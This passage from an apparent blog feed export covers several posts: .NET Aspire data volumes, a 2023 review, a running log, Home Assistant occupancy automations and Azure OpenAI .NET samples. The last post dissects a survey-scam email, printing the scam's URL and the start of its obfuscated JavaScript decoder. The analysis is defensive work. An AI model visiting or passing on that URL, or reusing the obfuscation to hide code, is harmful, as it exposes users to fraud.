Postgres data directory into the container so that the database is persisted .WithVolumeMount("./data/postgres", "/var/lib/postgresql/data", VolumeMountType.Bind); } And here’s the Azure Storage example:\n1 2 3 4 5 6 7 IResourceBuilder<AzureStorageResource> storage = builder.AddAzureStorage("azure-storage"); if (builder.Environment.IsDevelopment()) { storage.UseEmulator() .WithAnnotation(new VolumeMountAnnotation("./data/azurite", "/data", VolumeMountType.Bind)); } With this I’m mounting the ./data/<service name> folder from within the AppHost project into the respective data paths, but also wrapping them with a builder.Environment.IsDevelopment() check so that it only happens when running locally (since you don’t want to mount volumes in production - we’ll use the Azure services for that).\nNote: The Azure Storage emulator doesn’t have a WithVolumeMount method, so we have to use the WithAnnotation method, which is what the WithVolumeMount method wraps anyway. Also, due to this pull request it’s likely there’ll be an easier way come Preview 3, where you provide the ./data/azurite path as part of the UseEmulator method.\nNow when I restart my app, the data is persisted, meaning I don’t have to rebuild state each time. Just make sure you put those paths in the .gitignore file so that you don’t accidentally commit them to source control!\n", "id": "2024-01-23-persisting-data-volumes-with-dotnet-aspire" }, { "title": "2023 a Year in Review", "url": "https://www.aaron-powell.com/posts/2024-01-09-2023-a-year-in-review/", "date": "Tue, 09 Jan 2024 03:36:14 +0000", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "Would you look at that, I’m early this year (well, compared to my 2022 post)!\nAdmittedly, part of my was somewhat apathetic towards writing this post, mostly because I’m not sure that I have much “interesting” stuff from 2023 to share. But given that I’ve been doing this style of post consistently since 2017 (and sporadically prior to that), I figured I’d just start typing away and see what comes out.\nBlogging Over the past few years I’ve had a decrease in the number of posts I’ve written here, partially because I’ve been burnt out (see below), but partially because I haven’t felt that I’ve had much “interesting” stuff to share.\nThere were 22 posts that I wrote last year (ls -l | grep -c "^2023- did the count, thanks GitHub Copilot CLI 😜), but generally speaking, they are part of series that were either ongoing (9 about my smart home journey and 2 about GraphQL) or a new series that I kicked off around Generative AI.\nI’m not entirely sure if this is something I expect will change come 2024, maybe I’ll move away from the large (or as my wife would say meandering) blogs that I tend to write and do more short and sharp ones about narrow problem spaces. Or maybe I’ll just get GenAI to write more posts for me, that’s one way to turn the content wheel!\nPresenting and Conferences With the way my role is currently positioned conferences aren’t as big a thing as they once were, so with that I’ve been very selective on what events I’ve been submitting to, and as a result I only gave three talks last year at conferences, with the one I was most proud of being the keynote for DDD Adelaide in which I shared my career as a public speaker and the role that DDD had played in that.\nImage from Lars\nI’m a bit sad that this talk wasn’t recorded because it’s probably the talk I’m most proud of giving for a while, but maybe I can convince the organisers of other DDD’s in Australia that it’d be a good talk to have 😜.\nRecovering from burnout Before I wrote my last year in review post I wrote a post about burnout. That was a post that I wrote somewhat spur of the moment, didn’t review and just hit publish - it was just something I needed to get off my chest.\nThe response I got from that post was very heartwarming. I had dozens of people reach out publicly and privately to offer their support and share their stories. It was a very humbling experience and I’m very grateful for the support I received.\nI’m happy to say that I’m in a much better place now than I was when I wrote that post, and a lot of that I credit to the support I received in Cloud Advocacy to tackle what I wanted, which was to move to the .NET team. After I wrote the post our GM reached out to me to discuss next steps (I hadn’t told any of my management chain that I was writing that post, I just did it - maaaaaaaybe not the best move but it was still what I needed to do), and we agreed that I’d move to the .NET team.\nAnd while, as I noted in last years post, there is a bit of irony that managerial change was a large factor in my burnout and my solution was to get a new manager, the decision was very worthwhile. I’m now working with a team that I feel is a better fit for me, and I’m working on things that I’m more passionate about.\nAI Would it come as a shock to anyone if I said that AI was something that became more and more important to us at Microsoft throughout 2023?! 😜\nIn the first half of the year our team was trying to work out just what would it mean for the .NET on Azure CA team to be involved in AI and our manager was looking for who would lead it. I very much said no, I’ve seen enough fads come and go and I didn’t want to be on the AI hype train.\nWell, I’m now leading the AI efforts for the .NET on Azure CA team 😅.\nSo, what changed? Well, we had a talk that needed to be given as a “Beginners guide to Generative AI for .NET” and I found myself with a bit of bandwidth to do it and I figured that I’d give it a go. With that I started digging more into it, we had some more asks come up from partner teams, and over the next six months I found myself getting more and more interested in it.\nI’m still not sure if I’m on the AI hype train, but I’m definitely on the AI train and I’m enjoying the ride. I’ve had the opportunity to build some really fun demos, and I’ve got a few more projects in the works for 2024 that I’m really excited about.\nAnd with that, let’s bring on 2024.\nOnly some of this post was written by AI - GitHub Copilot + Markdown is awesome!\n", "id": "2024-01-09-2023-a-year-in-review" }, { "title": "1645km", "url": "https://www.aaron-powell.com/posts/2024-01-01-1645km/", "date": "Mon, 01 Jan 2024 00:19:39 +0000", "tags": [ "running" ], "description": "The story of my 2023 running journey.", "content": "Well, it was a goal of 1500km, just like in 2022 but again I’m gone and exceeded my plan.\nAnd as is becoming tradition, it’s time for me to reflect on the year that was in running and see what I’ve accomplished and what I’ve learned.\nThe raw stats Using my Strava profile as the source of truth (for running only, I did track some activities such as walking, gym and stand up paddle boarding), here’s the raw stats for the year:\n1,645km distance ran 133 hours and 56 minutes spent running (5 days, 13 hours and 56 minutes) 10,909 meters of elevation gain 223 activities logged 109 PB’s, 3 King of the Mountains and 3 Local Legends This is just under 100km further than last year, which surprised me as I hit my yearly goal at the end of November - so nearly a month early, and almost 2000m less elevation (12,719m was last year), again which surprised me.\nMy peak month was July with 182km covered, which tracks as that was the pointy end of training for City2Surf again.\nInjuries and surgery I started off 2023 with a slight calf injury as I chased the 👑 on two Strava segments at the end of 2022, but I wasn’t wearing good shoes for speed and that was not the best plan. But hey, I got the #1 spot, so it was worth it right 🤣.\nOtherwise, 2023 saw me mostly injury free. There was a minor niggle around City2Surf which turned out to be an overly tight ITB, but I was able to run through it.\nA lot of this injury-freeness I attribute to the fact that I kept up with my gym program the physio had me start, but I’ll cover that when I get to the training section.\nThe main reason I had a down period this year was having surgery on my right leg.\nSurgery For as long as I can remember I’ve had obvious varicose veins down my right calf. I’m not a vain person (ha!) so it hasn’t bothered me and I don’t get any pain from them so it was something I generally ignored. But after the injuries over the past few years I decided to get them looked at as I thought they might be related (they aren’t).\nI saw a surgeon in January and, to quote them, “those are some huge veins”. Since I don’t have any symptoms other than the visual ones, large veins and an increased diameter in both calf and ankle, surgery was considered optional but given I’m young, fit and in a financial position for it, I went under the knife in March.\nThis saw me out of running and the gym for a few weeks, but within a month I was back to easy running and within six weeks I was back to full training. Honestly, I was shocked at how much of a non-event it was to have had a vein the full length of my calf removed (plus a few other small ones), but since they are just surface-level ones they are seemingly not needed.\nBecause of the timing of this I skipped the May half marathon in Sydney, as while I’d be back to running for it I wouldn’t have had much training time, and given how last year went at that one I would prefer to train for it properly.\nRaces I set me sights on two races instead, City2Surf and the Sydney Marathon 21.1km (so… the Sydney Marathon Half Marathon 🤦) which was formerly the Blackmores half marathon.\nTraining Since there was only about six weeks between City2Surf and the Sydney Marathon 21.2km I was going to have to rely on the the training done for City2Surf as the base for the half marathon. This meant I had to be a bit more strategic with my training, but with the timing of the surgery in the end of March it was going to work out well for a slow build up and having consistency in my training.\nI stuck with a similar training program to last year:\nWednesday workout - this was a fortnightly rotation of speed and hills. For hills, I kept pretty consistent on the 3.5km undulating loop at a local park (building to two then three reps) while speed rotated between 400m and 1k distances on flat, generally with floats between, before finishing off with a tempo run, generally netting 10km per workout. Friday gym - I kept up with my gym program from the physio, which was focused on leg strength, but added a few core workouts to it as well as I have very poor core strength (the joys of being tall, skinny and inflexible). The program was 3 sets of 10 reps of each exercise, consisting of leg press, lunges, leg curls, step ups, calf raises, plank (1 min), squats, and situps. For the weighted exercises I kept the weights low-ish, I don’t think I even hit body weight, since I was more focusing on small building up and not trying to get huge. I’d also jog to/from the gym which would add about 5km to my running week. Saturday parkrun - gotta have parkrun in there. My wife was injured much of the start of the year so she wasn’t doing parkrun too, which gave me an excuse to not run with the pram (yay!) and where possible I’d run to/from which would take the 5km to 11km. Sunday long run - more often than not this would end up closer to tempo than “long and slow”, but I’ve come to the conclusion that it’s better for me to run at a pace that feels comfortable than to try and force myself to run slower. I’d generally aim for 15km. As a general rule of thumb I wanted to run 30km per week, and then with the training ramping up I wanted to hit 40km come June and peak at 50km in July (by adding another run to my week) before tapering off for City2Surf.\nThis didn’t quite go to plan as part way through June I felt my calf starting to strain so I eased back, peaking around the 45km mark in July.\nCity2Surf I had another cracking outing at City2Surf this year with another PB (57.13), which seemed pretty on-point for where I’d been training-wise. Maybe if I hadn’t had the minor setback and been able to hit my 50km-per-week goal I could have pushed for a sub-57, but I’m not too fussed.\nGoing into the race I felt pretty good, with one exception - don’t have a pizza with chilli on it the night before a race. Yeah… the bathroom queues at the start were long and I decided to skip them, but clenching for 14km is not fun 🤣.\nThe race went pretty much to plan, I started at the back of the pack as planned, found my groove moving through the thousands in front of me and was able to hit my stride as the pack thinned out. I kept the pacing pretty consistent, low 4minutes for the undulation and hitting high 3minutes for the downhill and flat sections. The fact that Strava says I got my 10km PB during the event is pretty crazy!\nI generally felt pretty strong out there, again a good testament to my training. I caught a friend at about 12km and gave some “gentle” encouragement (I thought you said you were racing this? 🤣) before leaving him for dead (he did run like a 58 and had run like 7km to the start plus was running home).\nAfter finishing I headed to the pub for a few celebratory beers, nothing like drinking before 9am on a Sunday, before heading back to get the bus up to the trains, only to find around 10,000 people in the bus queue and deciding that “hey, I can totally run the 2.5km uphill to the train station” which was totally a good idea at the time.\nI had booked a physio appointment for the Monday morning as I’d been having knee/quad pain in my right leg in the few weeks leading up, which weirdly disappeared after running City2Surf. The physio was equally baffled but it was clear that my ITB was tight, and the likely cause, so I was given some exercises to do and told to keep up with the gym work, so I could get through to the next race.\nSydney Marathon 21.1km I’m going to start off by saying that I was not a fan of this event. I’ve run the Blackmores half marathon a few times, it’s always been my favourite course - beautiful scenery, some hills at the start and then a dead flat back third. But this year the organisers decided they want to be part of the Abbots World Marathon Majors and for that the only thing that matters is the marathon distance, which was made very clear in the lead up to the event. We had the course changed from a city loop to out-and-back to Centennial Park, the start time was super early (before 6am), cut-off was dropped to 2.30 hours and we didn’t even get to finish at the Opera House. All of this meant I went to the event with a sour mood and aimed to just get it done.\nThe results obviously speak for themselves, I had a very good race resulting in a new PB at 87.08.\nBut this was a really mentally tough race. The start was really congested, as we only had 10 minutes to cross the start line (the few thousand that was doing this event) which meant that you were running very bunched up until hitting the Harbour Bridge where everyone spread out. Hitting Oxford street was really tough as I was already running in a thinning pack and there was no one supporting on course, so it was just a long, straight, uphill slog. I passed a pacer at about 8km and thought it was the 95 minute, so going into Centennial Park I was waiting to see the 90 minute pacer, but the next one I saw was the 85, and I realised there wasn’t a 95 and I was already running ahead of where I was aiming to be, whoops!\nThe return out of Centennial Park was a fair slog, I was mostly running solo and I felt bad for the folks running the other direction as it was packed - the road was only one car width (plus a bit of shoulder) so there wasn’t a lot of space and I just felt bad for all the people running it.\nAs we hit the downhill of Oxford street I was struggling mentally, there was only a few people I could see in front of me (we were pretty thinned out) and there was no crowds to speak of. When I hit 16km I said to myself “only a parkrun to go, 21 more minutes” and then saw a lone spectator with a sign saying “One parkrun left” and that made me smile and cheer back to them.\nFor the final few km we had Lady Macquarie Chair to run down and up from and this was something I was not looking forward to. I caught a glimpse of the 85 minute pacers again and judged they were about 2 minutes ahead of me. Since there was an uphill to go I wanted to hold that gap. I looped the end and looked out for the 90 minute pacers coming the other way and I saw them at about the same spot I was at when I’d seen the 85, meaning I was sitting around what would get me 87 minutes (yes, I could have looked at my watch but I don’t like doing that in races, I prefer to run by feel). So with the final push I was able to hold the spot I was at and finish with a new PB of 87.08, but the really exciting one for me was finish 86th (75th male), can’t complain about a top 100 finish!\nParkrun I didn’t do a whole lot of “racing” parkrun this year as I tended to stick it in the middle of a long-ish run, so it was more a tempo workout than anything. But what I did notice as training was getting underway was that I was able to run it harder for the same amount of effort. I ran 3 sub-20 St Peters parkruns this year which nearly doubled the number of times I’d run sub-20 there, and I had a few others that were close to it. In fact, for my last hit-out at St Peters this year I ran a PB of 19.11, which did feel like a 19.11, but mostly because my wife was tail walking with the kids and she said I had to run hard to come and pick them up from her - so I did 😅.\nBut the main parkrun goal I’ve had for myself was to break 19 minutes. Last year at Mudgee I ran 19.19 on a freezing cold day so I know in the right conditions I should be able to, but even shaving 20 seconds off would be a struggle, that’s 4s per km average.\nDuring the October school holidays we were camping down at Huskisson and I decided to do the Huskisson parkrun. I’d heard it’s a fast course, pretty much flat out and back, so I thought I’d give it a crack. I packed some of my faster running shoes, not the carbon-plated ones, but ones with a ridged plate in them.\nWell, I did it! Official time of 18.51 (although I like my watch time better 😜). It was pretty tough though. At around the 3km mark I tried to pass someone who I’d been sitting on the heals of, pulled up beside them and realised I wasn’t going to be able to hold on to the pace they were running (they ended up about 20s ahead of me at finish) so I went back to trying to find my groove and not crash and burn.\nThen at the start of December when we were up at Coffs Harbour and doing parkrun I decided to give it another crack. It was another nice morning and I was feeling good, so I went hard and was able to pull a 18.57! So, now I’m ready to retire 😁 (or maybe I can do a sub-19 St Peters after all).\nWrapping up 2023 has been another good year for my running. I’m finding my groove when it comes to training, both running and strength, that sees me avoiding much in the way of injury.\nI’m happy with how my races have gone, even if the half marathon I had my sights set on was a bit of a let down (from an experience, not an outcome) - I’m not sure what I’ll do next year regarding this race, I have no desire for the full marathon and I’m not sure if they’re going to run a half marathon again.\nI’ll probably be more relaxed in the goals as my wife is hoping to do her first marathon in 2024, so I’ll be supporting her in that. Maybe I’ll find a 10k and finally have an official sub-40 time.\nBut for now, I’m going to enjoy the rest of the holidays and get ready for 2024.\n", "id": "2024-01-01-1645km" }, { "title": "Building a Smart Home - Part 14 Motion, Occupancy, and Presence", "url": "https://www.aaron-powell.com/posts/2023-12-03-building-a-smart-home---part-14-motion-occupancy-and-presence/", "date": "Sat, 02 Dec 2023 22:03:57 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Walking into a room, lights turning on, feels like magic.", "content": "For the last six months I’ve been adding to my smart home the thing that makes it feel really futuristic, lights that turn on as you enter a room and then off when you leave. I’ve realised that I’ll go weeks without really using a light switch, at least not in our main living spaces as a result of this.\nSo, let’s look at the three components to this, movement in a room, people being in the room and who specifically is in the room, aka, motion, occupancy and presence.\nPresence Let’s start with presence, as I think this is the most interesting, but it also the one I’m not actively using anymore.\nPresence is interesting because everyone has subtle differences in the way they like things to behave. In our house, I am quite happy with the ambient light that comes in through our windows, especially in our kitchen/living downstairs, whereas my wife is more inclined to turn the lights on in situations I’d deem “adequate light levels”. In this case, presence can be useful to know who is in the room and adjust the lighting to meet the preferences of the people there, but that does require knowing who is in the room.\nThere’s a great project, ESPresence that can be used for this. It uses the Bluetooth signals from devices to map what’s detected to an individual, done using ESP32 devices.\nI have a bunch of ESP32’s in a draw just looking for a project, so I decided to give it a go, after all, my wife and I both have our phones on us most of the time as well as our Garmin watches, so we’re emitting Bluetooth signals all the time.\nUnfortunately I couldn’t get it to work as well as I’d like. It turns out that Garmin doesn’t broadcast Bluetooth signals as frequently as I’d need for capture (which is probably a good thing) and to use our phones, since we’re Android, you have to enable a feature in the Home Assistant mobile app which has a negative impact on battery life and it was impactful enough in my testing to be undesirable.\nSo I’ve decided to ditch presence detection for the time being, but if you want to see it in action, here’s a good video about setting this up.\nMotion Let’s talk about stuff that actually works, first is motion detection. For this, I’m using Passing infrared sensors, or PIR sensors for short. You’ve likely come across PIR sensors quite frequently, ever been in an office meeting room and had the lights come on when you enter? That’s most likely a PIR sensor.\nPIR sensors are great because they’re cheap, I have a bunch that use ZigBee (they report as ZG-204ZL but never report an illumination value so they may be misidentified), meaning they run off a coin cell battery and I can mount them anywhere.\nThe other great thing about PIR sensors is they are fast. They detect motion almost instantly, so you can have lights come on as you enter a room and not have to wait for them to come on. For example, I have one at the top and another at the bottom of our stairs, so when I’m going up or down the stairs, the lights come on.\nThe downside to PIR sensors is that they’re not great at detecting if someone is still in the room. Again, this is probably something that you’ve come across in an office meeting room, you’re sat in a meeting and the lights go off because you’ve not moved enough. Not really ideal when you’ve got a living space that the lights came on as you entered, then you are chilling on the couch and the lights go off (yes, that happened, no, my wife wasn’t amused).\nOccupancy Since PIR sensors won’t detect that you’re sitting still, or at least mostly still, we’re going to need something to detect occupancy, just whether or not someone is in the room, not just specific individuals.\nFor this, I’m using mmWave radar sensors. This isn’t exactly new technology but it’s really only in the last few years that it’s become affordable for hobbyists.\nWhat makes these sensors different is that they are able to detect very minor movements, such as breathing, so they’re great for detecting if someone is in a room, even if they’re not moving. There are two main drawbacks of these sensors, the first is that they aren’t as fast as a PIR sensor, so you can’t use them to turn lights on as you enter a room, you’d have a noticeable lag on that and you’d find yourself going for a light switch. The other drawback is that they detect any movement in the area they cover, and that could be a fan spinning rather than a person, giving “false positives” (or false occupancy in this case since it’s correctly identified movement but we really only care about human movement).\nI have two different mmWave devices, the first one I got was the EP1 which combines a PIR and mmWave (plus a few other sensors), and the others are Screek Workshop 2A which is just mmWave (and illuminance).\nEP1 vs 2A Both devices are ESP32 so they integrate into HA very easily using ESPHome, making setup a breeze. The EP1 is a bit more expensive, but it has a PIR sensor, so it’s faster to detect movement, and this is a huge positive if you’re wanting to do “lights on when you enter”. On the other hand, the 2A has a really complex zone management feature, capable of detecting up to three targets across three zones (which the EP1 originally couldn’t do, but now can with a firmware update, I just haven’t tried it out).\nI do also find the 2A to be a bit more sensitive, so it’s more likely to detect movement, but that’s not necessarily a good thing, especially if you’re trying to avoid false positives, which sees automation firing when it shouldn’t (or having complex conditional logic to avoid that). But they are a much slimmer design (due to the lack of PIR) so they can be hidden away a bit easier - I have two mounted behind couches in different rooms so that they detect you sitting on the couch but it’s not “in your face”.\nGenerally speaking, I’d go EP1 as the primary device and then use 2A’s as extenders or for more nuanced scenarios.\nHome Assistant tips These sensors are nothing if not integrated into HA, so here’s some tips that I’ve go from having them setup in our house.\nOccupancy zone Our downstairs living is made up of three “areas”, kitchen, dining and living, which are arranged in an L shape, with the hallway coming in between the kitchen and dining. I wanted to be able to detect someone entering from the hallway and if it’s dark, turn the light on, but I then want it to stay on if someone is in the zone, even if they’re not moving (say, sitting on the couch watching TV).\nBecause of the unusual shape of the room I have three sensors in there, a PIR covering the dining area, an EP1 in the kitchen and a 2A behind the couch. The reason for this is that the best mounting point for the EP1 is in the kitchen facing towards the hallway, but that also meant that there was a dead zone in the dining and then the lounge didn’t have any coverage at all.\nFor this, I created a binary group helper in HA called binary_sensor.occupancy_living_room that all sensors are in and if any of them report as “on” then the group is “on”. I then use this group in my automations to determine if someone is in the room.\nI’ve used a similar pattern with our stairs, having a PIR at the top and bottom, but a group which is “on” if either of them are on, so that if you’re going up or down the stairs, the lights stay on.\nAutomations The automations with this are pretty simple, if someone enters a room, turn the lights on. For detecting the “entering” part, it’s best to trigger on the PIR directly rather than the occupancy group, because mmWave sensors are slower to detect movement, but also can report more false positives, as mentioned above, so you can find lights being on at incorrect times as a result.\nFor the “leaving” part, I use the occupancy group with a timeout. In the main living zones I use a 5 minute timeout, but on the stairs and our WIR I use 30 seconds, since they are transient areas and it’s unlikely that you’re in them for more than 30 seconds without moving.\nAlso, since we have a cat who tends to walk around the house at all hours of the night, it’s important to have a way cater for that. While the cat doesn’t trigger the mmWave sensors (although there are other things that weirdly do which I can’t figure out) she does trigger the PIR sensors. Because of this, I disable the automations when our “end of day” routine runs and then re-enable them in the morning at 5.30am (which is when one of us is getting up to go to the gym/for a run/etc.).\nMedia Room I’ve started to experiment with a slightly more complex media room setup. In here I have a PIR and mmWave (Screek 2A), so the lights come on when you walk into the room and stay on while you’re there watching something. But here’s the thing about watching a movie, you’ll often sit pretty still and I found that the 2A would detect that as no movement and turn the lights off, which is not ideal. So I’ve added a condition to the automation that if the TV is on, the lights stay on, even if there’s no movement.\nHere’s that automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 alias: "Lighting: Media Room off" description: "" trigger: - platform: state entity_id: - binary_sensor.occupancy_media_room to: "off" for: hours: 0 minutes: 5 seconds: 0 condition: - condition: or conditions: - condition: state entity_id: media_player.media_room_tv state: idle - condition: state entity_id: media_player.media_room_tv state: "off" action: - service: light.turn_off data: {} target: entity_id: - light.media_room_light - light.media_room_downlights - service: input_boolean.turn_off data: {} target: entity_id: input_boolean.override_media_room_occupancy mode: single You’ll also notice that there’s a input_boolean.override_media_room_occupancy in there. This is used to manually override the occupancy detection, so if you manually turn the lights off then this is set to true and the “lights on when movement detected” won’t trigger until you turn off the TV and leave the room (which seems like a logical “we’re done” condition).\nDirection of travel When you go up our stairs and it’s “dark”, it’s quite logically that you’re next going to want the lights on the landing turned on, so I decided to experiment with creating a “direction of travel” value for our stairs. While I don’t use this anymore since the mmWave sensor was added up there, I thought it might be of interest to others.\nTo start with, I created a template sensor:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 - sensor: - name: "Stair direction of travel" unique_id: stair_direction_of_travel icon: mdi:stairs state: >- {% if is_state("binary_sensor.stairs_bottom_occupancy", "on") and is_state("binary_sensor.stairs_top_occupancy", "on") -%} {% if states.binary_sensor.stairs_bottom_occupancy.last_changed > states.binary_sensor.stairs_top_occupancy.last_changed -%} down {%- else -%} up {%- endif -%} {%- else -%} none {%- endif %} Here we look at the state of the two PIR sensors and when they are both on we determine which one was triggered last and set the state of the sensor to either “up” or “down”. If only one is on, or neither are on, then the state is “none”.\nThis can be combined with an automation to turn the lights on when you enter the stairs, but only if you’re going up:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 - id: "1688545254314" alias: "Lighting: going upstairs " description: "" trigger: - platform: state entity_id: - sensor.stair_direction_of_travel to: up condition: - condition: sun after: sunset - condition: time before: "19:00:00" - condition: and conditions: - condition: state entity_id: light.kids_lounge state: "off" - condition: state entity_id: switch.upstairs_hallway state: "off" action: - service: light.turn_on data: {} target: entity_id: light.kids_lounge mode: single Conclusion I’ve found that having lights come on as you enter a room and then turn off when you leave to be a really nice feature of our smart home. It’s one of those things that you don’t really notice until you don’t have it anymore, and then you realise how much you miss it. I’ve found myself walking into rooms that don’t have this and just standing there waiting for the lights to come on, only to realise that I need to turn them on myself, like a caveman!\nUsing a combination of PIR and mmWave really is the way to go when it comes to motion and occupancy. I do with my PIR sensors would detect LUX so that I could use them for illuminance as well, but that’s not a huge deal, just means that sometimes the lights are coming on when I don’t need them to.\nThe EP1 is really my pick of the devices, my only real complaint is that it’s a bit bulky and clearly stands out when mounted, but it’s something you “get used to”.\nI do wish I could get ESPresence working reliably, but I’m not sure that it would really improve things that much in our setup.\nIt’d be really cool to see how this can be applied in the bedrooms to do automatic bedtime routines for the kids/end of day triggering, but I feel like it’d be really hard to get right, and you don’t want lights coming on in the middle of the night in a bedroom!\n", "id": "2023-12-03-building-a-smart-home---part-14-motion-occupancy-and-presence" }, { "title": "Generative AI for .NET - Part 5 Streaming", "url": "https://www.aaron-powell.com/posts/2023-10-29-generative-ai-for-dotnet---part-5-streaming/", "date": "Sun, 29 Oct 2023 23:34:22 +0000", "tags": [ "dotnet", "ai" ], "description": "Let's get responses to the client as fast as we can.", "content": "When we explored Chat Completions in Part 3 we used the asynchronous API to call our model, but it’s still somewhat a blocking call in that we wait for the model to generate a response before sending to the client. This is how we would traditionally get data back to a client from a data source, since the data source we’re requesting from, like a database, will have all the data we need, it just has to “find it”. But when working with an LLM, it’s a bit different, we’re generating the data (response) on the fly, and depending on the complexity of the model, it can take a while to generate a response - and the longer it takes to generate, the more likely the user is going to assume something has been unsuccessful.\nStreaming Response Enter streaming responses. This is the experience that you’re more likely to be familiar with using tools like ChatGPT, Bing Chat, GitHub Copilot Chat, and so on. It’s where you receive the response back in chunks, as they’re generated, rather than waiting for the entire response to be generated before sending it back to the client.\nFor a streaming response we will call the GetChatCompletionsStreamingAsync method on our OpenAIClient object, which returns a Response<StreamingChatCompletions>. From here, everything is asynchronous iterations, which we can use the await foreach to step through:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 IAsyncEnumerable<StreamingChatChoice> choices = completions.Value.GetChoicesStreaming(); await foreach (StreamingChatChoice choice in choices) { IAsyncEnumerable<ChatMessage> messageStream = choice.GetMessageStreaming(); await foreach (ChatMessage message in messageStream) { string content = message.Content; Console.Write(content); } Console.WriteLine(); } First, we’ll iterate over the IAsyncEnumerable<StreamingChatChoice> which will give us each StreamingChatChoice that has been returned from the model. Remember, this defaults to one, but you can request a higher maximum, although that doesn’t guarantee you’ll get more than one.\nAs we iterate over the StreamingChatChoice we request a message stream using GetMessageStreaming that returns an IAsyncEnumerable<ChatMessage>. Iterating over this IAsyncEnumerable gives us each message chunk back from the model, which we can extract the content and send to the client. This is only the chunk from the last chunk, so our client will need to treat it as an append operation, not a replacement, which is why I’m using Console.Write here to continue on from the last point in the console.\nLet’s see our notebook sample in action:\nHere you see the chunks getting written out as they come back from the model. It’s worth noting that the response times are non-deterministic, so it could be that it’s very quick, as is the case in the above demo, or it might take a whole lot longer if the response is a lot more complex to generate.\nConclusion That’s it, we’ve seen how we can use streaming as an alternative way to get the response back from our model and send it to a client - a simple Console.Write statement in this case. The way you send the stream to the client will depend on what kinds of clients are being supported, but some options to consider are using web sockets (Azure SignalR Service is a good option there) or chunked HTTP responses.\nNext time we’ll start delving a bit more into aspects of prompt engineering and how we can use that to get better responses from our models.\n", "id": "2023-10-29-generative-ai-for-dotnet---part-5-streaming" }, { "title": "Generative AI and .NET - Part 4 Images", "url": "https://www.aaron-powell.com/posts/2023-10-06-generative-ai-and-dotnet---part-4-images/", "date": "Fri, 06 Oct 2023 03:58:48 +0000", "tags": [ "dotnet", "ai" ], "description": "Everything is better with visuals.", "content": "After text generation the most common thing you’re likely wanting to generate with an LLM is going to be images. We’ve all seen those awesome images generated with Midjourney, Stable Diffusion, DALL-E, and others. In this post we’ll look at how to generate images with .NET and an LLM, specifically the DALL-E models from OpenAI. We’ll use DALL-E 2 because at the time of writing DALL-E 3 isn’t available, but I anticipate that it will work the same from a .NET perspective.\nCalling the API Since the DALL-E models are part of the OpenAI LLM family, we’ll use the same OpenAIClient class that we used in the previous posts in this series, with the only difference being the method that we call, GetImageGenerationsAsync.\n1 2 3 4 5 6 7 8 9 10 string prompt = "A painting of a cat sitting on a chair"; Response<ImageGenerations> response = await client.GetImageGenerationsAsync(new ImageGenerationOptions { Prompt = prompt }); ImageGenerations imageGeneration = response.Value; Uri imageUri = imageGeneration.Data[0].Uri; Console.WriteLine($"Image URI: {imageUri}"); Really, it’s just that easy.\nImage Generation Options With the ImageGenerationOptions class we’re able to control some aspects of the image generation process. The options are:\nImageCount: how many images you want back (defaults to 1 but you can get up to 10). ResponseFormat: do you want a URL to the image or a base64 encoded string of the image (defaults to URL). Size: how big an image do you want from the options of 256, 512, or 1024 (defaults to 1024). Note: Images are always square. User: a unique identifier for the user who the image is generated for. This isn’t needed and will default to nothing, but OpenAI uses it to monitor for abuse, so if you’re creating an app where anyone can generate an image, it could be useful to include. What you’ll notice is that you don’t have some of the other controls that we had when doing text generation, around things like Temperature and TopP. This is because these properties are used to influence how the model would generate the next token (word) in the sequence for the completion, but since we aren’t dealing with a text output there’s no need for them.\nConclusion That’s it! It’s really that easy to generate images with .NET and an LLM.\nAnd yes, the banner image for this post was generated with AI (I might have cheated and used the newly released DALL-E 3 model via Bing Create) using the prompt I need a banner image for a blog post about generating images with AI. Make something creative and abstract.\n", "id": "2023-10-06-generative-ai-and-dotnet---part-4-images" }, { "title": "Oh Look a Phishing Attempt", "url": "https://www.aaron-powell.com/posts/2023-09-20-oh-look-a-phishing-attempt/", "date": "Wed, 20 Sep 2023 04:06:20 +0000", "tags": [ "security" ], "description": "It seems to be my lucky day, I've gotten about a dozen of these in the last 24 hours.", "content": "A little over a year ago I wrote about dissecting some phishing attempts and while I still got the odd one here and there, nothing really was slipping through the M365 spam filters.\nUntil yesterday that is. Over the last 24 hours I’ve gotten around a dozen phishing attempts to one of the sub-addresses on my domain, and given that there was so many I figured I’d take a look at them.\nTaking it apart The first thing I noticed about this one is that it had gotten through my spam filter, and when I opened the email I could see why, the email wasn’t a text-with-image email, it was a HTML email with a single image in it.\nSince that is just a large image in the email body, and with no alt-text, there’s nothing for the spam filter to scan for, without it doing OCR. Also, it’s surprisingly lacking in spelling mistakes, which are a really easy way to catch these things. It is worth noting that the image wasn’t displayed initially, I had to tell Outlook to allow the image to be displayed for an untrusted email address.\nWhere to next Unlike the last ones which had you download a HTML file and then it was all done locally, this linked me off to an external website. Here’s the address http://allallaossn.lat/cl/5394_d/6/72997/137/35/77720 although you probably shouldn’t click on it, unless you want to go digging yourself. The address bounced through a few other locations, presumably setting some cookies or capturing other bits of info about me, and then it landed me here:\nInterestingly enough when I opened it in Chrome I ended up at a different page with a different survey pipeline:\nI’m going to stick with dissecting the Edge version, as that’s what I started with. It’s also worth noting that while I expected this to be a standard phishing attempt, it’s actually a survey scam, which is a little different. The goal of this is to get you to complete a survey, and then you get a prize. The prize could be a lot of different things (we’ll see my prizes later on), but the goal of this scam is to get you to subscribe to a paid service that is really hard to get out of.\nThe page make up I opened up the source of the page and it turned out that it doesn’t really contain any HTML, just some JavaScript includes. You’ll find a gist of the source if you want to play along.\nI expected that it’d work similar to the local file ones I looked at last time, and that turned out to be correct. There’s a huge string of text and some obfuscated functions in the code. This is the most interesting part (formatted for readability):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 var _0xc50e = [ "", "split", "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/", "slice", "indexOf", "", "", ".", "pow", "reduce", "reverse", "0", ]; function _0xe23c(d, e, f) { var g = _0xc50e[2][_0xc50e[1]](_0xc50e[0]); var h = g[_0xc50e[3]](0, e); var i = g[_0xc50e[3]](0, f); var j = d[_0xc50e[1]](_0xc50e[0]) [_0xc50e[10]]() 